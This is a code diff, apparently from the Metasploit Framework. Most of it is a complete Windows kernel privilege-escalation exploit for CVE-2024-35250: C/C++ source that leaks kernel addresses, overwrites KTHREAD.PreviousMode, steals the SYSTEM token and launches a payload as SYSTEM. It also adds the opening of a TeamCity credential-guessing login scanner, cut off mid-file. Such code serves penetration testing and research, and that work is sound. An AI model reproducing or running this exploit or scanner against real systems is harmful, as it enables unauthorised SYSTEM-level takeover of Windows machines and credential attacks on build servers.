+      <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
+      <StringPooling>true</StringPooling>
+      <RuntimeLibrary>MultiThreadedDLL</RuntimeLibrary>
+      <FunctionLevelLinking>false</FunctionLevelLinking>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <EnableUAC>false</EnableUAC>
+      <GenerateMapFile>true</GenerateMapFile>
+      <ProgramDatabaseFile>$(OutDir)$(TargetName).pdb</ProgramDatabaseFile>
+      <MapFileName>$(OutDir)$(TargetName).map</MapFileName>
+      <RandomizedBaseAddress>false</RandomizedBaseAddress>
+      <ImportLibrary>$(OutDir)$(ProjectName).lib</ImportLibrary>
+      <AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <ClCompile>
+      <PrecompiledHeader>NotUsing</PrecompiledHeader>
+      <WarningLevel>Level3</WarningLevel>
+      <FunctionLevelLinking>false</FunctionLevelLinking>
+      <IntrinsicFunctions>false</IntrinsicFunctions>
+      <SDLCheck>
+      </SDLCheck>
+      <PreprocessorDefinitions>WIN32;NDEBUG;RDLLTEMPLATE_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>false</ConformanceMode>
+      <PrecompiledHeaderFile>stdafx.h</PrecompiledHeaderFile>
+      <AdditionalIncludeDirectories>..\ReflectiveDLLInjection\common;..\ReflectiveDLLInjection\dll\src;..\..\ReflectiveDLLInjection\common;..\..\ReflectiveDLLInjection\dll\src;..\..\..\ReflectiveDLLInjection\common;..\..\..\ReflectiveDLLInjection\dll\src;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
+      <TreatWarningAsError>true</TreatWarningAsError>
+      <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
+      <StringPooling>true</StringPooling>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+      <AssemblerListingLocation>$(OutDir)\</AssemblerListingLocation>
+      <ObjectFileName>$(OutDir)\</ObjectFileName>
+      <ProgramDataBaseFileName>$(OutDir)\</ProgramDataBaseFileName>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+      <GenerateDebugInformation>false</GenerateDebugInformation>
+      <EnableUAC>false</EnableUAC>
+      <AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
+      <GenerateMapFile>false</GenerateMapFile>
+      <MapFileName>$(OutDir)$(TargetName).map</MapFileName>
+      <ProgramDatabaseFile>$(OutDir)$(TargetName).pdb</ProgramDatabaseFile>
+      <RandomizedBaseAddress>false</RandomizedBaseAddress>
+      <ImportLibrary>$(OutDir)$(ProjectName).lib</ImportLibrary>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <ClCompile>
+      <PrecompiledHeader>NotUsing</PrecompiledHeader>
+      <WarningLevel>Level3</WarningLevel>
+      <FunctionLevelLinking>false</FunctionLevelLinking>
+      <IntrinsicFunctions>false</IntrinsicFunctions>
+      <SDLCheck>
+      </SDLCheck>
+      <PreprocessorDefinitions>NDEBUG;RDLLTEMPLATE_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>false</ConformanceMode>
+      <PrecompiledHeaderFile>stdafx.h</PrecompiledHeaderFile>
+      <AdditionalIncludeDirectories>C:\users\msfuser\Documents\git\metasploit-framework\external\source\include\windows;..\ReflectiveDLLInjection\common;..\ReflectiveDLLInjection\dll\src;..\..\ReflectiveDLLInjection\common;..\..\ReflectiveDLLInjection\dll\src;..\..\..\ReflectiveDLLInjection\common;..\..\..\ReflectiveDLLInjection\dll\src;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
+      <TreatWarningAsError>false</TreatWarningAsError>
+      <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
+      <StringPooling>true</StringPooling>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+      <AssemblerListingLocation>$(OutDir)\</AssemblerListingLocation>
+      <ObjectFileName>$(OutDir)\</ObjectFileName>
+      <ProgramDataBaseFileName>$(OutDir)\</ProgramDataBaseFileName>
+      <LanguageStandard>Default</LanguageStandard>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+      <GenerateDebugInformation>false</GenerateDebugInformation>
+      <EnableUAC>false</EnableUAC>
+      <AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
+      <GenerateMapFile>false</GenerateMapFile>
+      <MapFileName>$(OutDir)$(TargetName).map</MapFileName>
+      <ProgramDatabaseFile>$(OutDir)$(TargetName).pdb</ProgramDatabaseFile>
+      <RandomizedBaseAddress>false</RandomizedBaseAddress>
+      <ImportLibrary>$(OutDir)$(ProjectName).lib</ImportLibrary>
+      <ForceFileOutput>MultiplyDefinedSymbolOnly</ForceFileOutput>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemGroup>
+    <ClCompile Include="dllmain.c" />
+    <ClCompile Include="exploit.cpp" />
+  </ItemGroup>
+  <ItemGroup>
+    <ClInclude Include="exploit.h" />
+  </ItemGroup>
+  <ItemGroup>
+    <ResourceCompile Include="CVE-2024-35250.rc" />
+  </ItemGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+  <ImportGroup Label="ExtensionTargets">
+  </ImportGroup>
+</Project>
@@ -0,0 +1,44 @@
+#define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
+#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
+
+#include "ReflectiveLoader.c"
+#include "common.h"
+
+#ifdef __cplusplus
+extern "C" {
+#endif
+
+	int Exploit(PMSF_PAYLOAD lpReserved);
+
+#ifdef __cplusplus
+}
+#endif
+
+void main(PMSF_PAYLOAD lpReserved) {
+	Exploit(lpReserved);
+	return;
+}
+
+BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved)
+{
+	PMSF_PAYLOAD payload = (PMSF_PAYLOAD)lpReserved;
+	switch (dwReason)
+	{
+	case DLL_QUERY_HMODULE:
+		hAppInstance = hinstDLL;
+		if (lpReserved != NULL)
+		{
+			*(HMODULE*)lpReserved = hAppInstance;
+		}
+		break;
+	case DLL_PROCESS_ATTACH:
+		hAppInstance = hinstDLL;
+		main(payload);
+		break;
+	case DLL_PROCESS_DETACH:
+	case DLL_THREAD_ATTACH:
+	case DLL_THREAD_DETACH:
+		break;
+	}
+	return TRUE;
+}
@@ -0,0 +1,413 @@
+/*
+				PoC Info
+--------------------------------------------------------------
+Vulnerability:	        CVE-2024-35250
+Tested environment:	    Windows 11 22h2 Build 22621
+						Windows 10 20h2 Build 19042
+						Windows 10 1607 Build 14393
+						Windows Server 2022 Build 20348
+						Windows Server 2019 Build 17763
+						Windows Server 2016 Build 14393
+						VMWare Fusion Professional Version 13.6.0
+Author:                 varwara (edited by jheysel for metasploit compatibility)
+Weakness:		        CWE-822: Untrusted Pointer Dereference
+Known limitations:	    Didn't work in Hyper-V environments
+Required privileges:    Medium IL
+--------------------------------------------------------------
+*/
+#define __STREAMS__
+#define _INC_MMREG
+#define _PREVIOUS_MODE		0xbaba
+
+#include <Windows.h>
+#include <winternl.h>
+#include <strmif.h>
+#include <ks.h>
+#include <ksproxy.h>
+#include <ksmedia.h>
+#include <stdio.h>
+#include <SetupAPI.h>
+#include <functiondiscovery.h>
+#include <mmdeviceapi.h>
+#include <stdint.h>
+#include <safeint.h>
+#include <ntstatus.h>
+#include <TlHelp32.h>
+#include <winsvc.h>
+#include "exploit.h"
+#include "common.h"
+#include <processthreadsapi.h>
+
+#pragma comment(lib, "Ksproxy.lib")
+#pragma comment(lib, "ksuser.lib")
+#pragma comment(lib, "ntdll.lib")
+#pragma comment(lib, "ntdllp.lib")
+#pragma comment(lib, "SetupAPI.lib")
+#pragma comment(lib, "Advapi32.lib")
+
+const EPROCESS_OFFSETS* g_pEprocessOffsets = NULL;
+fNtQuerySystemInformation NtQuerySystemInfo = NULL;
+fRtlGetNtVersionNumbers RtlGetNtVersionNumbers = NULL;
+
+//
+// Get the kernel object pointer for the specific process by it's handle
+// 
+int32_t GetObjPtr(_Out_ PULONG64 ppObjAddr, _In_ ULONG ulPid, _In_ HANDLE handle)
+
+{
+	int32_t Ret = -1;
+	PSYSTEM_HANDLE_INFORMATION pHandleInfo = 0;
+	ULONG ulBytes = 0;
+	NTSTATUS Status = STATUS_SUCCESS;
+
+
+
+	//
+	// Handle heap allocations to overcome STATUS_INFO_LENGTH_MISMATCH
+	//
+	while ((Status = NtQuerySystemInformation((SYSTEM_INFORMATION_CLASS)SystemHandleInformation, pHandleInfo, ulBytes, &ulBytes)) == 0xC0000004L)
+	{
+		if (pHandleInfo != NULL)
+		{
+			pHandleInfo = (PSYSTEM_HANDLE_INFORMATION)HeapReAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, pHandleInfo, (size_t)2 * ulBytes);
+		}
+
+		else
+		{
+			pHandleInfo = (PSYSTEM_HANDLE_INFORMATION)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, (size_t)2 * ulBytes);
+		}
+	}
+
+	if (Status != NULL)
+	{
+		Ret = Status;
+		goto done;
+	}
+
+	for (ULONG i = 0; i < pHandleInfo->NumberOfHandles; i++)
+	{
+		if ((pHandleInfo->Handles[i].UniqueProcessId == ulPid) && (pHandleInfo->Handles[i].HandleValue == (unsigned short)handle))
+		{
+			*ppObjAddr = (unsigned long long)pHandleInfo->Handles[i].Object;
+			Ret = 0;
+			break;
+		}
+	}
+
+
+done:
+	if (pHandleInfo != NULL)
+	{
+		HeapFree(GetProcessHeap(), 0, pHandleInfo);
+	}
+	return Ret;
+}
+
+//
+// ALlocate fake bitmap for arbitrary r/w operations
+//
+void* AllocateBitmap(SIZE_T size, LPVOID baseAddress) {
+
+	LPVOID allocatedMemory = VirtualAlloc(baseAddress, size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+
+	if (allocatedMemory == NULL)
+	{
+		return NULL;
+	}
+
+	return allocatedMemory;
+}
+
+UINT_PTR GetKernelModuleAddress(const char* TargetModule)
+{
+	NTSTATUS status;
+	ULONG ulBytes = 0;
+	PSYSTEM_MODULE_INFORMATION handleTableInfo = NULL;
+
+	while ((status = NtQuerySystemInformation((SYSTEM_INFORMATION_CLASS)SystemModuleInformation, handleTableInfo, ulBytes, &ulBytes)) == STATUS_INFO_LENGTH_MISMATCH)
+	{
+		if (handleTableInfo != NULL)
+		{
+			handleTableInfo = (PSYSTEM_MODULE_INFORMATION)HeapReAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, handleTableInfo, 2 * ulBytes);
+		}
+
+		else
+		{
+			handleTableInfo = (PSYSTEM_MODULE_INFORMATION)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 2 * ulBytes);
+		}
+	}
+
+	if (status == 0)
+	{
+		for (ULONG i = 0; i < handleTableInfo->ModulesCount; i++)
+		{
+			char* moduleName = strstr(handleTableInfo->Modules[i].Name, TargetModule);
+			if (moduleName != NULL)
+			{
+				return (UINT_PTR)handleTableInfo->Modules[i].ImageBaseAddress;
+			}
+		}
+	}
+	else
+	{
+		if (handleTableInfo != NULL)
+		{
+			HeapFree(GetProcessHeap(), 0, handleTableInfo);
+			return 0;
+		}
+	}
+
+	HeapFree(GetProcessHeap(), 0, handleTableInfo);
+
+	return 0;
+}
+
+DWORD64 leak_gadget_address(LPCSTR GadgetName)
+{
+	DWORD64 module_base_kernel, rtlSetAllBits_address;
+	HMODULE module_base_user;
+
+	module_base_user = LoadLibraryExW(L"ntoskrnl.exe", NULL, DONT_RESOLVE_DLL_REFERENCES);
+	if (!module_base_user)
+		goto error;
+
+	rtlSetAllBits_address = (DWORD64)GetProcAddress(module_base_user, GadgetName);
+	if (!rtlSetAllBits_address) {
+		goto error;
+	}
+	module_base_kernel = GetKernelModuleAddress("ntoskrnl.exe");
+	rtlSetAllBits_address = module_base_kernel + (rtlSetAllBits_address - (DWORD64)module_base_user);
+
+	return rtlSetAllBits_address;
+error:
+	return FALSE;
+}
+
+//
+// A wrapper to make arbitrary writes to the whole system memory address space
+//
+NTSTATUS Write64(void* Dst, void* Src, size_t Size)
+{
+	NTSTATUS Status = 0;
+	PULONG cbNumOfBytesWrite = 0;
+
+	Status = NtWriteVirtualMemory(GetCurrentProcess(), Dst, Src, Size, cbNumOfBytesWrite);
+	if (!NT_SUCCESS(Status))
+	{
+		return -1;
+	}
+	return Status;
+}
+
+void ExecutePayload(PMSF_PAYLOAD pMsfPayload) {
+	if (!pMsfPayload)
+		return;
+	PVOID pPayload = VirtualAlloc(NULL, pMsfPayload->dwSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+	if (!pPayload)
+		return;
+	CopyMemory(pPayload, &pMsfPayload->cPayloadData, pMsfPayload->dwSize);
+	CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)pPayload, NULL, 0, NULL);
+}
+
+static BOOL ResolveRequirements(DWORD dwMajor, DWORD dwMinor, DWORD dwBuild) {
+
+	dwBuild = LOWORD(dwBuild);
+	if ((dwMajor == 10) && (dwMinor == 0)) {
+		if ((dwBuild >= 14393) && (dwBuild <= 19045)) {
+			if ((dwBuild < 15063)) {
+				g_pEprocessOffsets = &EprocessOffsetsWin10v1607;
+			}
+			else if ((dwBuild < 16299)) {
+				g_pEprocessOffsets = &EprocessOffsetsWin10v1703;
+			}
+			else if ((dwBuild < 17134)) {
+				g_pEprocessOffsets = &EprocessOffsetsWin10v1709;
+			}
+			else if ((dwBuild < 17763)) {
+				g_pEprocessOffsets = &EprocessOffsetsWin10v1803;
+			}
+			else if ((dwBuild < 18362)) {
+				g_pEprocessOffsets = &EprocessOffsetsWin10v1809;
+			}
+			else if ((dwBuild < 19041)) {
+				g_pEprocessOffsets = &EprocessOffsetsWin10v1903;
+			}
+			else if ((dwBuild < 19043)) {
+				g_pEprocessOffsets = &EprocessOffsetsWin10v2004;
+			}
+			else if ((dwBuild == 19044)) {
+				g_pEprocessOffsets = &EprocessOffsetsWin10v21H2;
+			}
+			else if ((dwBuild == 19045)) {
+				g_pEprocessOffsets = &EprocessOffsetsWin10v21H2;
+			}
+		}
+		else if (dwBuild == 22000) {
+			g_pEprocessOffsets = &EprocessOffsetsWin11v21H2;
+		}
+		else if (dwBuild == 20348) {
+			g_pEprocessOffsets = &EprocessOffsetsWinServer2022;
+		}
+		else if (dwBuild == 22621) {
+			g_pEprocessOffsets = &EprocessOffsetsWin11v22H2;
+		}
+	}
+	else {
+		return FALSE;
+	}
+	return TRUE;
+}
+
+
+extern "C" int Exploit(PMSF_PAYLOAD pMsfPayload)
+{
+	HRESULT hr;
+	HANDLE hDrmDevice = NULL;
+	UCHAR InBuffer[sizeof(KSPROPERTY) + sizeof(EXPLOIT_DATA2)] = { 0 };
+	KSPROPERTY* pInBufProperty = (KSPROPERTY*)InBuffer;
+	EXPLOIT_DATA2* pInBufPropertyData = (EXPLOIT_DATA2*)(pInBufProperty + 1);
+
+	UCHAR UnserializePropertySetRequest[sizeof(KSPROPERTY_SERIALHDR) + sizeof(KSPROPERTY_SERIAL) + sizeof(EXPLOIT_DATA1)] = { 0 };
+
+	KSPROPERTY_SERIALHDR* pSerialHdr = (KSPROPERTY_SERIALHDR*)UnserializePropertySetRequest;
+	PKSPROPERTY_SERIAL pSerial = (KSPROPERTY_SERIAL*)(pSerialHdr + 1);
+	EXPLOIT_DATA1* pOutBufPropertyData = (EXPLOIT_DATA1*)(pSerial + 1);
+
+	BOOL res = FALSE;
+	NTSTATUS status = 0;
+
+	uint32_t Ret = 0;
+
+	const GUID categories[] = {
+		KSCATEGORY_DRM_DESCRAMBLE,
+	};
+
+	//
+	// Get a KS object device with ksproxy.ax API
+	//
+	for (int i = 0; i < sizeof(categories) / sizeof(categories[0]); i++)
+	{
+		hr = KsOpenDefaultDevice(categories[i], GENERIC_READ | GENERIC_WRITE, &hDrmDevice);
+
+		if (hr != NOERROR) {
+			return -1;
+		}
+
+	}
+
+	uint64_t Sysproc = 0;
+	uint64_t Curproc = 0;
+	uint64_t Curthread = 0;
+
+	HANDLE hCurproc = 0;
+	HANDLE hThread = 0;
+
+	//
+	// Leak System _EPROCESS kernel address
+	//
+	Ret = GetObjPtr(&Sysproc, 4, (HANDLE)4);
+	if (Ret != NULL)
+	{
+		return Ret;
+	}
+
+	//
+	// Leak Current _KTHREAD kernel address
+	//
+	hThread = OpenThread(THREAD_QUERY_INFORMATION, TRUE, GetCurrentThreadId());
+	if (hThread != NULL)
+	{
+		Ret = GetObjPtr(&Curthread, GetCurrentProcessId(), hThread);
+		if (Ret != NULL)
+		{
+			return Ret;
+		}
+	}
+
+	//
+	// Leak Current _EPROCESS kernel address
+	//
+	hCurproc = OpenProcess(PROCESS_QUERY_INFORMATION, TRUE, GetCurrentProcessId());
+	if (hCurproc != NULL)
+	{
+		Ret = GetObjPtr(&Curproc, GetCurrentProcessId(), hCurproc);
+		if (Ret != NULL)
+		{
+			return Ret;
+		}
+	}
+
+	//
+	// Get necessary offsets based on Windows Version
+	//
+	HMODULE hNtdll = GetModuleHandle("ntdll");
+	NtQuerySystemInfo = (fNtQuerySystemInformation)GetProcAddress(hNtdll, "NtQuerySystemInformation");
+	if (NtQuerySystemInfo == NULL) {
+		return FALSE;
+	}
+
+	if (!(RtlGetNtVersionNumbers = (fRtlGetNtVersionNumbers)GetProcAddress(hNtdll, "RtlGetNtVersionNumbers"))) {
+		return FALSE;
+	}
+
+	/* get the version to determine the necessary eprocess offsets */
+	DWORD dwMajor, dwMinor, dwBuild;
+	RtlGetNtVersionNumbers(&dwMajor, &dwMinor, &dwBuild);
+	if (!ResolveRequirements(dwMajor, dwMinor, dwBuild)) {
+		return 0;
+	}
+
+	//
+	// Initialize input buffer
+	//
+	pInBufProperty->Set = KSPROPSETID_DrmAudioStream;
+	pInBufProperty->Flags = KSPROPERTY_TYPE_UNSERIALIZESET;
+	pInBufProperty->Id = 0x0;
+
+	//
+	// Initialize output buffer
+	//
+	pSerialHdr->PropertySet = KSPROPSETID_DrmAudioStream;
+	pSerialHdr->Count = 0x1;
+
+	pSerial->PropertyLength = sizeof(EXPLOIT_DATA1);
+	pSerial->Id = 0x0;                // Should be null
+	pSerial->PropTypeSet.Set = KSPROPSETID_DrmAudioStream;
+	pSerial->PropTypeSet.Flags = 0x0; // Should be null
+	pSerial->PropTypeSet.Id = 0x45;   // Irrelevant value
+
+	//
+	// Intialize fake property data
+	//
+	uint64_t ntoskrnl_user_base = 0;
+	HMODULE outModule = 0;
+	UINT_PTR ntoskrnlKernelBase = GetKernelModuleAddress("ntoskrnl.exe");
+	pOutBufPropertyData->FakeBitmap = (PRTL_BITMAP)AllocateBitmap(sizeof(RTL_BITMAP), ULongLongToPtr64(0x10000000));
+
+	//
+	// FakeBitmap initialization for the overwriting KTHREAD.PreviousMode field technique
+	//
+	pOutBufPropertyData->FakeBitmap->SizeOfBitMap = 0x20;
+	pOutBufPropertyData->FakeBitmap->Buffer = ULongLongToPtr64(Curthread + KTHREAD_PREVIOUS_MODE_OFFSET); //  KTHREAD.PreviousMode field address 
+	pInBufPropertyData->ptr_ArbitraryFunCall = ULongLongToPtr64(leak_gadget_address("RtlClearAllBits"));  // This gadget will zeroing KTHREAD.PreviousMode field
+
+	//
+	// Send property request to trigger the vulnerability
+	//
+	res = DeviceIoControl(hDrmDevice, IOCTL_KS_PROPERTY, pInBufProperty, sizeof(InBuffer), pSerialHdr, sizeof(UnserializePropertySetRequest), NULL, NULL);
+
+	uint8_t mode = UserMode; // We set UserMode in restoring thread state phase to avoid BSOD in further process creations
+	Write64(ULongLongToPtr64(Curproc + g_pEprocessOffsets->Token), ULongLongToPtr64(Sysproc + g_pEprocessOffsets->Token), /* Token size */ 0x8);
+
+	//
+	// Restoring KTHREAD.PreviousMode phase
+	//
+	Write64(ULongLongToPtr64(Curthread + KTHREAD_PREVIOUS_MODE_OFFSET), &mode, sizeof(mode));
+
+	//
+	// Execute the payload as NT AUTHORITY\SYSTEM
+	//
+	ExecutePayload(pMsfPayload);
+
+	return 0;
+}
@@ -0,0 +1,115 @@
+#pragma once
+
+#define NtCurrentProcess() ((HANDLE)(LONG_PTR)-1)
+#define EPROCESS_TOKEN_OFFSET			0x4B8
+#define KTHREAD_PREVIOUS_MODE_OFFSET	0x232    
+#define SystemHandleInformation			0x10
+#define SystemModuleInformation         11
+#define SystemHandleInformationSize		0x400000
+
+
+typedef VOID(__stdcall* fRtlGetNtVersionNumbers)(
+	DWORD* MajorVersion,
+	DWORD* MinorVersion,
+	DWORD* BuildNumber
+	);
+
+typedef NTSTATUS(__stdcall* fNtQuerySystemInformation)(
+	SYSTEM_INFORMATION_CLASS SystemInformationClass,
+	PVOID                    SystemInformation,
+	ULONG                    SystemInformationLength,
+	PULONG                   ReturnLength
+	);
+
+enum _MODE
+{
+    KernelMode = 0,
+	UserMode = 1
+};
+
+typedef struct SYSTEM_MODULE {
+    ULONG                Reserved1;
+    ULONG                Reserved2;
+#ifdef _WIN64
+    ULONG				Reserved3;
+#endif
+    PVOID                ImageBaseAddress;
+    ULONG                ImageSize;
+    ULONG                Flags;
+    WORD                 Id;
+    WORD                 Rank;
+    WORD                 w018;
+    WORD                 NameOffset;
+    CHAR                 Name[255];
+}SYSTEM_MODULE, * PSYSTEM_MODULE;
+
+typedef struct SYSTEM_MODULE_INFORMATION {
+    ULONG                ModulesCount;
+    SYSTEM_MODULE        Modules[1];
+} SYSTEM_MODULE_INFORMATION, * PSYSTEM_MODULE_INFORMATION;
+
+typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO
+{
+USHORT UniqueProcessId;
+USHORT CreatorBackTraceIndex;
+UCHAR ObjectTypeIndex;
+UCHAR HandleAttributes;
+USHORT HandleValue;
+PVOID Object;
+ULONG GrantedAccess;
+} SYSTEM_HANDLE_TABLE_ENTRY_INFO, *PSYSTEM_HANDLE_TABLE_ENTRY_INFO;
+
+typedef struct _SYSTEM_HANDLE_INFORMATION
+{
+	ULONG NumberOfHandles;
+	SYSTEM_HANDLE_TABLE_ENTRY_INFO Handles[1];
+} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;
+
+__inline void * ULongLongToPtr64( const unsigned long long ull )
+{
+    return( (void *)(ULONG_PTR)ull );
+}
+
+//
+// Declare some functions from ntdll.dll
+//
+extern "C" 
+{
+	NTSTATUS RtlGUIDFromString(PUNICODE_STRING GuidString, GUID* Guid);
+
+    NTSTATUS RtlStringFromGUID(REFGUID Guid, PUNICODE_STRING GuidString);
+
+    NTSTATUS NtImpersonateThread(HANDLE ThreadHandle, HANDLE ThreadToImpersonate, SECURITY_QUALITY_OF_SERVICE* SecurityQualityOfService);
+
+    NTSTATUS NtWriteVirtualMemory(HANDLE ProcessHandle, PVOID BaseAddress, PVOID Buffer, ULONG NumberOfBytesToWrite,  PULONG NumberOfBytesWritten OPTIONAL );
+}
+
+
+#define DRM_DEVICE_OBJECT L"\\\\?\\root#system#0000#{ffbb6e3f-ccfe-4d84-90d9-421418b03a8e}\\{eec12db6-ad9c-4168-8658-b03daef417fe}&{abd61e00-9350-47e2-a632-4438b90c6641}"
+
+//DEFINE_GUIDSTRUCT("3C0D501A-140B-11D1-B40F-00A0C9223196", KSNAME_Server);
+//#define KSNAME_Server DEFINE_GUIDNAMED(KSNAME_Server)
+
+//DEFINE_GUIDSTRUCT("3C0D501B-140B-11D1-B40F-00A0C9223196", KSPROPSETID_Service);
+//#define KSPROPSETID_Service DEFINE_GUIDNAMED(KSPROPSETID_Service)
+
+//
+// Declare data structures related to the exploit
+//
+typedef struct _RTL_BITMAP
+{
+	DWORD SizeOfBitMap;
+	PVOID Buffer;
+}RTL_BITMAP, *PRTL_BITMAP;
+
+#pragma pack(1)
+typedef struct _EXPLOIT_DATA1
+{
+    PRTL_BITMAP  FakeBitmap;    
+}EXPLOIT_DATA1;
+
+typedef struct _EXPLOIT_DATA2
+{
+    char pad[0x20];
+    PVOID ptr_ArbitraryFunCall; // kCFG bypass gadget function, for example RtlSetAllBits
+} EXPLOIT_DATA2;
@@ -92,7 +92,6 @@ class Metasploit::Framework::Command::Console < Metasploit::Framework::Command::
      driver_options['ModulePath'] = options.modules.path
      driver_options['Plugins'] = options.console.plugins
      driver_options['Readline'] = options.console.readline
-      driver_options['RealReadline'] = options.console.real_readline
      driver_options['Resource'] = options.console.resources
      driver_options['XCommands'] = options.console.commands

@@ -0,0 +1,298 @@
+require 'metasploit/framework/login_scanner/http'
+
+module Metasploit
+  module Framework
+    module LoginScanner
+
+      # This is the LoginScanner class for dealing with JetBrains TeamCity instances.
+      # It is responsible for taking a single target, and a list of credentials
+      # and attempting them. It then saves the results.
+      class TeamCity < HTTP
+
+        module Crypto
+          # https://github.com/openssl/openssl/blob/a08a145d4a7e663dd1e973f06a56e983a5e916f7/crypto/rsa/rsa_pk1.c#L125
+          # https://datatracker.ietf.org/doc/html/rfc3447#section-7.2.1
+          def pkcs1pad2(text, n)
+            raise ArgumentError, "Cannot pad the text: '#{text.inspect}'" unless text.is_a?(String)
+            raise ArgumentError, "Invalid message length: '#{n.inspect}'" unless n.is_a?(Integer)
+
+            bytes_per_char = two_byte_chars?(text) ? 2 : 1
+            if n < ((bytes_per_char * text.length) + 11)
+              raise ArgumentError, 'Message too long'
+            end
+
+            ba = Array.new(n, 0)
+            n -= 1
+            ba[n] = text.length
+
+            i = text.length - 1
+
+            while i >= 0 && n > 0
+              char_code = text[i].ord
+              i -= 1
+
+              num_bytes = bytes_per_char
+
+              while num_bytes > 0
+                next_byte = char_code % 0x100
+                char_code >>= 8
+
+                n -= 1
+                ba[n] = next_byte
+
+                num_bytes -= 1
+              end
+            end
+            n -= 1
+            ba[n] = 0
+
+            while n > 2
+              n -= 1
+              ba[n] = rand(1..255) # Can't be a null byte.
+            end
+
+            n -= 1
+            ba[n] = 2
+            n -= 1
+            ba[n] = 0
+
+            ba.pack("C*").unpack1("H*").to_i(16)
+          end
+
+          # @param [String] modulus
+          # @param [String] exponent
+          # @param [String] text
+          # @return [String]
+          def rsa_encrypt(modulus, exponent, text)
+            n = modulus.to_i(16)
+            e = exponent.to_i(16)
+
+            padded_as_big_int = pkcs1pad2(text, (n.bit_length + 7) >> 3)
+            encrypted = padded_as_big_int.to_bn.mod_exp(e, n)
+            h = encrypted.to_s(16)
+
+            h.length.odd? ? h.prepend('0') : h
+          end
+
+          def two_byte_chars?(str)
+            raise ArgumentError, 'Unable to check char size for non-string value' unless str.is_a?(String)
+
+            str.each_codepoint do |codepoint|
+              return true if codepoint >> 8 > 0
+            end
+
+            false
+          end
+
+          def max_data_size(str)
+            raise ArgumentError, 'Unable to get maximum data size for non-string value' unless str.is_a?(String)
+
+            # Taken from TeamCity's login page JavaScript sources.
+            two_byte_chars?(str) ? 58 : 116
+          end
+
+          # @param [String] text The text to encrypt.
+          # @param [String] public_key The hex representation of the public key to use.
+          # @return [String] A string blob.
+          def encrypt_data(text, public_key)
+            raise ArgumentError, "Cannot encrypt the provided data: '#{text.inspect}'" unless text.is_a?(String)
+            raise ArgumentError, "Cannot encrypt data with the public key: '#{public_key.inspect}'" unless public_key.is_a?(String)
+
+            exponent = '10001'
+            e = []
+            utf_text = text.dup.force_encoding(::Encoding::UTF_8)
+            g = max_data_size(utf_text)
+
+            c = 0
+            while c < utf_text.length
+              b = [utf_text.length, c + g].min
+
+              a = utf_text[c..b]
+
+              encrypt = rsa_encrypt(public_key, exponent, a)
+              e.push(encrypt)
+              c += g
+            end
+
+            e.join('')
+          end
+        end
+
+        include Crypto
+
+        DEFAULT_PORT         = 8111
+        LIKELY_PORTS         = [8111]
+        LIKELY_SERVICE_NAMES = [
+          # Comes from nmap 7.95 on MacOS
+          'skynetflow',
+          'teamcity'
+        ]
+        PRIVATE_TYPES        = [:password]
+        REALM_KEY            = nil
+
+        LOGIN_PAGE = 'login.html'
+        LOGOUT_PAGE = 'ajax.html?logout=1'
+        SUBMIT_PAGE = 'loginSubmit.html'
+
+        class TeamCityError < StandardError; end
+        class StackLevelTooDeepError < TeamCityError; end
+        class NoPublicKeyError < TeamCityError; end
+        class PublicKeyExpiredError < TeamCityError; end
+        class DecryptionError < TeamCityError; end
+        class ServerNeedsSetupError < TeamCityError; end
+
+        # Checks if the target is JetBrains TeamCity. The login module should call this.
+        #
+        # @return [Boolean] TrueClass if target is TeamCity, otherwise FalseClass
+        def check_setup
+          request_params = {
+            'method' => 'GET',
+            'uri' => normalize_uri(@uri.to_s, LOGIN_PAGE)
+          }
+          res = send_request(request_params)
+
+          if res && res.code == 200 && res.body&.include?('Log in to TeamCity')
+            return false
+          end
+
+          "Unable to locate \"Log in to TeamCity\" in body. (Is this really TeamCity?)"
+        end
+
+        # Extract the server's public key from the server.
+        # @return [Hash] A hash with a status and an error or the server's public key.
+        def get_public_key
+          request_params = {
+            'method' => 'GET',
+            'uri' => normalize_uri(@uri.to_s, LOGIN_PAGE)
+          }
+
+          begin
+            res = send_request(request_params)
